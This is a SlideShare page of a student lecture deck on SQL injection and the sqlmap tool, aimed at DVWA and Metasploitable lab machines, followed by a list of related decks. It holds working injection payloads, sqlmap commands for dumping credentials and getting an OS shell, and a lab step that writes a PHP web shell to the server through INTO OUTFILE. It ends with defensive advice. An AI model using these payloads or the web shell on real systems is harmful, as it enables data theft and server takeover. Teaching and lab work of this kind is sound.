SlideShare ist ein Scribd-Unternehmen logo

SQL Injection

Abhinav Nair
Abhinav Nair
BildungTechnologie
1 von 33
Downloaden Sie, um offline zu lesen
SQL Injection Username Password Rushi, Abhinav, Yuvaraj, Xingmeng
SQL ● Special Programming Language for handling data stored in Relational Database Management Systems (RDBMS) ● Used to insert, display and store information from a website on a server. ● Essential for dynamic websites ● Works on the servers. For example : Apache, MS server etc.
SQL Injection ● Detects and exploits database flaws to take control of entire database ● Checks for vulnerabilities in: ○ Forms (Username, Password and other fields of forms) ○ URLs (Data requests sent to servers to fetch or write data) ● Fingerprints the back-end DBMS ● Enumerates or retrieves data of interest such as table dumps, usernames, passwords etc. ● Eventually exploiting the system once useful data is obtained such as - OS takeover, web server takeover, data change etc.
SQLMAP - The Tool ● Open source penetration testing tool ● Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers ● Comes with a powerful detection engine, ● Broad range of switches lasting from ○ database fingerprinting, ○ over data fetching from the database, ○ to accessing the underlying file system ○ executing commands on the operating system via out-of-band connections.
Utility of Tool ● Attacking vulnerable websites ● Protecting your own websites from exploits [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
Developers Miroslav Stampar Bernardo Damele A. G.
The Flow
Injectable Parameters Example URL -> http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 We want to check if the id parameter is injectable we will try the following code http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1 http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2 The first address returns the same webpage as the original URL [TRUE] The second address returns a page different from the original URL [FALSE] Therefore we know that the id parameter is injectable because the backend database evaluates the appended statement to true, and to false correctly.
Automatic Payloads ● Payloads are injected SQL statements used to try and grab data from the web-site ● Example Payload- > http://172.16.151.129/dvwa/vulnerabilities/sqli/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20DISTINCT% 28IFNULL%28CAST%28schema_name%20AS%20CHAR%29%2C0x20%29%29%20FROM% 20INFORMATION_SCHEMA.SCHEMATA%20LIMIT%206%2C1%29%2C11%2C1%29%29%3E56%20AND%20% 27eHhW%27%3D%27eHhW&Submit=Submit ● Clearly payloads are complicated and hence the process is automated by creating them based on the underlying DBMS, OS and web-server ● These payloads are created and tested to grab information from the underlying database by attempting to gain access to the INFORMATION_SCHEMA ● The INFORMATION_SCHEMA contains information about users, tables and procedures ● If no schema is found, sqlmap has a collection of 5 k table names and column names it can use in brute force.
Attack Payloads Normal Page More Data Returned Some data returned
Fingerprinting Mechanism - The underlying web-server is detected through HTTP cookies and headers, similar to what we saw in class - The DBMS is fingerprinted through error message parsing, banner parsing and version specific payloads.
The Command Executing SQLMap Target URL + SQL Injection python sqlmap.py -u "http://172.16.151.140/dvwa/vulnerabilities/sqli/? id=1&Submit=Submit#" --cookie=" PHPSESSID=18884db21c1ac46083760375da62d10c; security=low" Browser Session ID
Injection Techniques 1. Boolean 2. Error-based 3. Time-based 4. Union Attack. 5. Stacked queries
Boolean Based Blind The command flag: --technique b How does it work: 1. “Blind” is when the results of the SQL injection are not visible to the attacker. 2. “Boolean” means that the injected SQL can either be evaluated to TRUE or FALSE 3. Together-> The web-page is displayed differently based on whether the injected statement evaluates to TRUE or FALSE For example ‘ and 1=2 [FALSE]
Error Based Blind The command flag: --technique E How does it work: ● Works only when the web application has been configured to disclose back-end DBMS error messages “Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1” ● Detect the backend DBMS by passing random values to the id parameter causing it to throw an error “http://172.16.151.129/dvwa/vulnerabilities/sqli/?id=1”
Time Based Blind The command flag: --technique t How does it work: 1. 2. sqlmap replaces or appends to the affected parameter in the HTTP request, a syntactically valid SQL statement string containing a query which put on hold the back-end DBMS to return for a certain number of seconds. For each HTTP response, by making a comparison between the HTTP response time with the original request, the tool inference the output of the injected statement character by character. For example select ShipCity, Dest from Orders where ShipCity='' waitfor delay '0:0:10'
Union Attack Technique The command flag: --technique u How does it work: 1. Using the boolean-based attack and error based attacked to guess the database type and # of column and column type 2. Using the Union keyword to execute the command to obtain the useful information. For example ‘ and 1=2 Union select password from users
Stacked Query Attack 1. Allow to use the “;” in the sql injection command to execute command. 2. It is always used to upload a file when conducting sql-injection. NB: MySQL-PHP are widely use but stacked query is not allowed by default to security reason
Features
User, Password and Table Enumeration The command: --dbs --all, --dbs --users, --dbs --current-user How to execute the arbitrary command: ● ● After successfully attacking the database, sqlmap will output all the information about the available users, passwords, tables, columns and much more Dictionary based attack can be used to crack the passwords.
Execute Arbitrary Commands The command: --sql-shell How to execute the arbitrary command: After successfully attacking the database,there will be a sql-shell command line to tell you to execute sql command; The Example Output screenshot as follows:
Execute Arbitrary Commands (Cont..) The example of executing command: select * from users How it works: Once the username and password are known for a DB user, then we can remotely connect to the DB and run SQL
OS Takeover ● Run commands on the underlying operating system of the server ● Flags ○ --os-shell -> access to a remote shell ○ --os-cmd -> run a command on the server ● Example ● Works by SQLmap uploading a binary executable containing two user defined functions --os-cmd pwd sys_eval() and sys_exec() to the the database and then running them to access the database.
How to Defend SQL Injection Attack 1. Comprehensive data sanitization. We have to limit the data type of user input data for different web application. For example, if we develop an application for phone number, then the only data type is int and the value is (0~9). 2. Use a web application firewall. There existing a popular and open source module ModSecurity. This module is available for the three most popular web servers,like,Apache Microsoft IIS and nginx. Except this feature, it also provides a complicated and ever-evolving set of rules to protect the web servers from being attacked. 3. Limit database privileges by context. Taking an example, if we have admin user, normal working user and other group user. We need to differ the credential tables into 3 levels. Hence even the attackers successfully attacks the table. And only low credential tables will be shown. 4. Avoid constructing SQL queries with user input. Using prepared SQL statements or procedures to deal with user inquiry will enhance the safety of a database.
References Reference link: https://github.com/sqlmapproject/sqlmap Homepage: http://sqlmap.org Download: .tar.gz or .zip Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom Issue tracker: https://github.com/sqlmapproject/sqlmap/issues User's manual: https://github.com/sqlmapproject/sqlmap/wiki Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ Twitter: @sqlmap Demos: #1 and #2 Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots http://www.esecurityplanet.com/hackers/how-to-prevent-sql-injection-attacks.html
Lab Questions 1.How is time-based sql injection different from other types of SQL injection? 2. What Changes would you make to the DVWA system to prevent this type of attacks?
Answers 1. There is no big difference between “regular” boolean attack and time-based boolean attack. The “Normal” blind attack is based on the difference between the returned values. If there is no difference in the returned value then the time-based attack will be used. 2. Sanitize input, limit database privileges, avoid using direct user input to form DB queries.
3) In this part we will gain access to a shell in the browser without the use of SQLmap 3.1) Navigate to [metasploitable IP] /dvwa/vulnerabilities/sqli/ using a browser in KALI 3.2) Which PHP statement will allow you to run a command on the underlying OS? <? system($_REQUEST['cmd']);?> 3.3) By submitting things using the submission box find out which parameter is injectable id 3.4) Run the payload ' union select "TEXT",2 INTO OUTFILE '/tmp/im_in.txt'# 3.5) View the contents of the /tmp/im_in.txt file Metasploitable 3.6) Using the 3.4 and 3.2 craft a payload to run commands on metasploitable from the Kali browser union select "<? system($_REQUEST['cmd']);?>",2 INTO OUTFILE '/var/www/test/execcmp. php'#
Questions?

Empfohlen

SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesChema Alonso
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injectionmatt_presson
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesChema Alonso
 

Empfohlen

SQL Injection Tutorial
SQL Injection TutorialSQL Injection Tutorial
SQL Injection TutorialMagno Logan
 
Time-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesTime-Based Blind SQL Injection using Heavy Queries
Time-Based Blind SQL Injection using Heavy QueriesChema Alonso
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Time-Based Blind SQL Injection
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injectionmatt_presson
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Web application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresWeb application attacks using Sql injection and countermasures
Web application attacks using Sql injection and countermasuresCade Zvavanjanja
 
Time-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesTime-Based Blind SQL Injection Using Heavy Queries
Time-Based Blind SQL Injection Using Heavy QueriesChema Alonso
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in PythonPublic Broadcasting Service
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAsish Kumar Rath
 
Sql injection
Sql injectionSql injection
Sql injectionSasha-Leigh Garret
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 

Weitere ähnliche Inhalte

Was ist angesagt?

Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586Stacy Watts
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 

Was ist angesagt? (20)

Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL Injection
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
Sql injection
Sql injectionSql injection
Sql injection
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
SQL Injection Attacks cs586
SQL Injection Attacks cs586SQL Injection Attacks cs586
SQL Injection Attacks cs586
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 

Andere mochten auch

Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSskyhawk133
 
ArchitectureDesignPatternsStoryV3
ArchitectureDesignPatternsStoryV3ArchitectureDesignPatternsStoryV3
ArchitectureDesignPatternsStoryV3Andrew Rea
 
Union based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointUnion based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointAl Zarqali
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Grand Parade Poland
 
Sql injection 幼幼班
Sql injection 幼幼班Sql injection 幼幼班
Sql injection 幼幼班hugo lu
 
Blind SQL Injection - Optimization Techniques
Blind SQL Injection - Optimization TechniquesBlind SQL Injection - Optimization Techniques
Blind SQL Injection - Optimization Techniquesguest54de52
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 

Andere mochten auch (10)

Sql injection
Sql injectionSql injection
Sql injection
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
Protecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSSProtecting Your Web Site From SQL Injection & XSS
Protecting Your Web Site From SQL Injection & XSS
 
ArchitectureDesignPatternsStoryV3
ArchitectureDesignPatternsStoryV3ArchitectureDesignPatternsStoryV3
ArchitectureDesignPatternsStoryV3
 
Union based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials PointUnion based sql injection by Urdu Tutorials Point
Union based sql injection by Urdu Tutorials Point
 
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)
 
Sql injection 幼幼班
Sql injection 幼幼班Sql injection 幼幼班
Sql injection 幼幼班
 
Blind SQL Injection - Optimization Techniques
Blind SQL Injection - Optimization TechniquesBlind SQL Injection - Optimization Techniques
Blind SQL Injection - Optimization Techniques
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
 
Sql Injection Myths and Fallacies
Sql Injection Myths and FallaciesSql Injection Myths and Fallacies
Sql Injection Myths and Fallacies
 

Ähnlich wie SQL Injection

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersoazabir
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsPositive Hack Days
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitKevin Kline
 
SQLi for Security Champions
SQLi for Security ChampionsSQLi for Security Champions
SQLi for Security ChampionsPetraVukmirovic
 
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconDEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconSanjiv Kawa
 
Database Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David IzahkDatabase Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David Izahksqlserver.co.il
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpMindfire Solutions
 
Data Handning with Sqlite for Android
Data Handning with Sqlite for AndroidData Handning with Sqlite for Android
Data Handning with Sqlite for AndroidJakir Hossain
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 
2013_protect_presentation
2013_protect_presentation2013_protect_presentation
2013_protect_presentationJeff Holland
 
Sql Automation 20090610
Sql Automation 20090610Sql Automation 20090610
Sql Automation 20090610livingco
 

Ähnlich wie SQL Injection (20)

Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
Web Security
Web SecurityWeb Security
Web Security
 
Scaling asp.net websites to millions of users
Scaling asp.net websites to millions of usersScaling asp.net websites to millions of users
Scaling asp.net websites to millions of users
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server Toolkit
 
SQLi for Security Champions
SQLi for Security ChampionsSQLi for Security Champions
SQLi for Security Champions
 
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconDEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
 
Database Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David IzahkDatabase Mirror for the exceptional DBA – David Izahk
Database Mirror for the exceptional DBA – David Izahk
 
Asp
AspAsp
Asp
 
SQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads UpSQLMAP Tool Usage - A Heads Up
SQLMAP Tool Usage - A Heads Up
 
Data Handning with Sqlite for Android
Data Handning with Sqlite for AndroidData Handning with Sqlite for Android
Data Handning with Sqlite for Android
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
 
PPT
PPTPPT
PPT
 
2013_protect_presentation
2013_protect_presentation2013_protect_presentation
2013_protect_presentation
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql Automation 20090610
Sql Automation 20090610Sql Automation 20090610
Sql Automation 20090610
 

Kürzlich hochgeladen

4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptxmary850239
 
Reading and Writing Skills 11 quarter 4 melc 1
Reading and Writing Skills 11 quarter 4 melc 1Reading and Writing Skills 11 quarter 4 melc 1
Reading and Writing Skills 11 quarter 4 melc 1GloryAnnCastre1
 
Choosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for ParentsChoosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for Parentsnavabharathschool99
 
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONTHEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATIONHumphrey A Beña
 
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQ-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQuiz Club NITW
 
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITW
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITWQ-Factor HISPOL Quiz-6th April 2024, Quiz Club NITW
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITWQuiz Club NITW
 
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...Nguyen Thanh Tu Collection
 
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptx
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptxDIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptx
DIFFERENT BASKETRY IN THE PHILIPPINES PPT.pptxMichelleTuguinay1
 
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptxQ4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptxlancelewisportillo
 
How to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseHow to Make a Duplicate of Your Odoo 17 Database
How to Make a Duplicate of Your Odoo 17 DatabaseCeline George
 
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)lakshayb543
 
Transaction Management in Database Management System
Transaction Management in Database Management SystemTransaction Management in Database Management System
Transaction Management in Database Management SystemChristalin Nelson
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfVanessa Camilleri
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4JOYLYNSAMANIEGO
 
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxAUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptx
AUDIENCE THEORY -CULTIVATION THEORY - GERBNER.pptxiammrhaywood
 
Using Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea DevelopmentUsing Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea Developmentchesterberbo7
 
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...Team Lead Succeed – Helping you and your team achieve high-performance teamwo...
Team Lead Succeed – Helping you and your team achieve high-performance teamwo...Association for Project Management
 

Kürzlich hochgeladen (20)

4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx
 
Reading and Writing Skills 11 quarter 4 melc 1
Reading and Writing Skills 11 quarter 4 melc 1Reading and Writing Skills 11 quarter 4 melc 1
Reading and Writing Skills 11 quarter 4 melc 1
 
Choosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for ParentsChoosing the Right CBSE School A Comprehensive Guide for Parents
Choosing the Right CBSE School A Comprehensive Guide for Parents
 
THEORIES OF ORGANIZATION-PUBLIC ADMINISTRATION
